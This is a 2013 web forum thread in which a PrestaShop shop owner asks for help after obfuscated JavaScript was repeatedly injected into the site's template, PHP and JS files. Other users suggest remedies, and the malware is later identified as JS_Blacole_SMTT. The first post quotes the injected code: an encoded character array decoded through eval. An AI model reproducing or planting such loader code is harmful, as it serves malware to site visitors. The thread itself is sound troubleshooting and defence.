sgnappo Posted June 2, 2013 Share Posted June 2, 2013 Hi to all, yesterday my web site with prestashop 1.5.3.1 returned only a blank page. I activated the displaying of errors and so I seen that the following error was returned: Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/var/www/clients/client1/web1/web/modules/blockcurrencies/blockcurrencies.tpl" on line 62 "</div><!--0c0896--><script type="text/javascript" language="javascript" > ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,155,147,153,160,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,155,147,153,160,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,152,171,152,155,157,151,166,170,62,154,171,63,147,163,171,162,170,151,166,62,164, in /var/www/clients/client1/web1/web/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627 I accessed to files through FTP and I seen that the file blockcurrencies.tpl was modified on the same day and inside there was the following code: <!--0c0896--> <script type="text/javascript" language="javascript"> ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,...."[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); </script> <!--/0c0896--> I deleted that code but the error was returned on another page. All index.php, .tpl and .js files were modified with that malicious code. In a couple of hours I cleaned all files....but today I have again the same problem with all files modified and the web site off. How can I prevent this issue? My file have 644 permissions but this is not enough. Please help me to secure the site. Many thanks Regards Salvatore Link to comment Share on other sites More sharing options...
vekia Posted June 2, 2013 Share Posted June 2, 2013 This problem may be realted to... another webpages (if you've got) on the same hosting package. So, have you got? Wordpress? Joomla? if not, maybe the problem is related to... your computer. When you connect to the FTP - all files on it will be infected. another one idea, maybe you use some non-default and non-safe addons? Link to comment Share on other sites More sharing options...
Bill Dalton Posted June 2, 2013 Share Posted June 2, 2013 The first thing you need to do is change your FTP and phpmyadmin password. Link to comment Share on other sites More sharing options...
sgnappo Posted June 3, 2013 Author Share Posted June 3, 2013 (edited) Hi Vekia / Bill Dalton, thanks for reply. On my server (a dedicated host on a cloud platform) there is only one web site with Prestashop. There are only Prestahop addons. I don't think my PC is tyhe problem. No virus/malware was found by the antivirus and then after I cleaned all files, the site was running for one day and then again the same problem. There have been two modification in the last 12 hours. Yesterday at 22.00 and today at 06.00 all files have been modified again. Should be a script hosted on the server which runs automatically? How to find it? PS: The Back-end is running. Many thanks for replies. Regards Salvatore Edited June 3, 2013 by sgnappo (see edit history) Link to comment Share on other sites More sharing options...
vekia Posted June 3, 2013 Share Posted June 3, 2013 If you've got date on which files have been changed - chceck cron jobs. If you've got also apache log - check connections to your website related to date on which files have been infected. Link to comment Share on other sites More sharing options...
sgnappo Posted June 3, 2013 Author Share Posted June 3, 2013 The log files contains a lot of Bots access. These accesses are suspect: 173.199.116.195 AhrefsBot/4.0; +http://ahrefs.com/robot 77.88.26.27 YandexImages/3.0; +http://yandex.com/bots 184.170.134.30 Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729 There are no Cron Jobs. Now I am downloading all files in order to check if there is an external script inside. Have you other suggestions? Thanks and regards Salvatore Regards Link to comment Share on other sites More sharing options...
vekia Posted June 3, 2013 Share Posted June 3, 2013 in logs you checked the time related to the date of files change? any connections related to the php scripts? Link to comment Share on other sites More sharing options...
sgnappo Posted June 3, 2013 Author Share Posted June 3, 2013 Yes, I checked lines close the time of change (6.03am). --------ACCESS LOG------- 77.88.26.27 - - [03/Jun/2013:05:56:55 +0200] "GET /robots.txt HTTP/1.1" 200 2334 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 77.88.26.27 - - [03/Jun/2013:05:56:57 +0200] "GET /18851-home_default/toner-originale-canon-fx-4.jpg HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" 66.249.72.25 - - [03/Jun/2013:06:00:38 +0200] "GET /toner-rigenerati/818-toner-rigenerato-brother-dr-300.html HTTP/1.1" 503 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.72.25 - - [03/Jun/2013:06:02:37 +0200] "GET /toner-rigenerati/818-toner-rigenerato-brother-dr-300.html HTTP/1.1" 503 659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 173.199.116.195 - - [03/Jun/2013:06:03:16 +0200] "GET /271-cartucce-compatibili-stampanti-brother-intellifax-2300ml HTTP/1.1" 503 666 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)" 66.249.72.25 - - [03/Jun/2013:06:03:26 +0200] "GET /60-cartucce-compatibili-stampanti-brother-dcp-185c HTTP/1.1" 503 660 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 65.36.241.76 - - [03/Jun/2013:06:04:15 +0200] "GET / HTTP/1.1" 503 1233 "-" "InternetSeer.com" ------------------- No connections related PHP scripts :-( Link to comment Share on other sites More sharing options...
vekia Posted June 3, 2013 Share Posted June 3, 2013 so everything looks fine :/ No cron jobs, no connections to php scripts... here is a nice thread about similar issue: http://stackoverflow.com/questions/16264707/opencart-ajax-json-response-unknown-characters i think that one page from your hoster (not page on your hosting account) is infected. Link to comment Share on other sites More sharing options...
sgnappo Posted June 3, 2013 Author Share Posted June 3, 2013 I have read the thread and it is very similar to my issue. However, I have just uploaded a clean versione of PS and the site is running. I am waiting for new changes :-). I hope none. Thanks Salvatore Link to comment Share on other sites More sharing options...
vekia Posted June 3, 2013 Share Posted June 3, 2013 don't forget to let us know if everything will work fine Link to comment Share on other sites More sharing options...
sgnappo Posted June 4, 2013 Author Share Posted June 4, 2013 Yes, until now everything is fine. However the name of the virus is "JS_Blacole_SMTT". I have downloaded the whole site on my PC and my antivirus has detected it and removed the code from all files. I let you updated Regards Salvatore Link to comment Share on other sites More sharing options...
vekia Posted June 4, 2013 Share Posted June 4, 2013 im googling for it, no results :| Link to comment Share on other sites More sharing options...
sgnappo Posted June 4, 2013 Author Share Posted June 4, 2013 Here is it: http://about-threats.trendmicro.com/Malware.aspx?id=57883&name=JS_BLACOLE.SMTT&language=en Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now